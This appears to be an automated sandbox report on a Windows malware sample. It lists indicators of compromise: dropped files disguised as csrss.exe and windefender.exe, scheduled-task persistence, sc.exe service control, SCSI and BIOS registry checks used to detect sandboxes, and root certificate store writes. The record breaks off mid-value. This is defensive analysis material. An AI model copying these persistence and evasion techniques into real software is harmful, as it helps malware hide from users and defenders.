description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20231025045611.cab makecab.exe File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job schtasks.exe File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job schtasks.exe File created C:\Windows\Tasks\ztlTbPYifermRZH.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job schtasks.exe File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune 85FA.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3024 sc.exe 1696 sc.exe 1112 sc.exe 1356 sc.exe 2632 sc.exe 2868 sc.exe 912 sc.exe 1712 sc.exe 1716 sc.exe 2324 sc.exe 2932 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2580 108 WerFault.exe 65 2356 1344 WerFault.exe 127 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3012 schtasks.exe 2736 schtasks.exe 1680 schtasks.exe 2808 schtasks.exe 3056 schtasks.exe 2576 schtasks.exe 112 schtasks.exe 2616 schtasks.exe 1988 schtasks.exe 948 schtasks.exe 2952 schtasks.exe 1704 schtasks.exe 2792 schtasks.exe 1736 schtasks.exe 2848 schtasks.exe 2936 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A8EC3301-72F2-11EE-A12E-CA9958541264} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000efee191c820df7499e31472656722fd500000000020000000000106600000001000020000000fec6fa574cf806e759750a278605f3c935ce5c5ac4daac937e701d647e086a94000000000e80000000020000200000009f5dfb8a6e01f499dcc8f1460d2bb0e49572864503a1819ba2b7ae978470a72990000000b39b247490fce05d5c26c0e8c3386a9687a843d77673673fa94644353d2274d9ff2776f36bc77c67c5971202c464eadc088bf881bfc2f150ba79124e700a83f7047fcc49c649c0a8db6d9cedc0b000be840881d729de39330bc5f436e1c4989b43117e1c86efc53bc40ba453f92c2b00c7261c7a3c24a9410453c6d2e0aa3b2986d4732e29a02bdfd1d929ad1e113f54400000005698800e2af8f20eff362afe513db2352b65011800d69fd1a55df63aaf20af95e81cd00f4d0c0726cffab35592c09d30b3dbe9471648aee6239bd1e4e75b0856 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A9313AE1-72F2-11EE-A12E-CA9958541264} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000efee191c820df7499e31472656722fd50000000002000000000010660000000100002000000074f12a2ab539888a43b3efef2d37580e391ffd06bfb037673121667782b4a0a3000000000e8000000002000020000000170b1db6d6886592dcbf1c2580320f10ef963c868303daa320fb68bdb5c65ab020000000aead24089d0279dd6bc9a9db13882a2fd706f30eb07718ae896e64838d5d563340000000084e340e68b49c700e834000ec6b8ce94e687a5320a2144f1ef24884f2c7b536a02366a6e483dd8cafb16c08614b9a0e9a6b3c9e478109509775dbcb4627c0e2 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20b00782ff06da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404371580" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rnYrbGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{648D23C2-FFC6-4C85-A80C-75A0CB92B484}\de-96-be-8a-9a-dd rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates rnYrbGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{648D23C2-FFC6-4C85-A80C-75A0CB92B484}\WpadDecisionReason = "1" rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{648D23C2-FFC6-4C85-A80C-75A0CB92B484}\WpadNetworkName = "Network 2" rnYrbGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs rnYrbGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 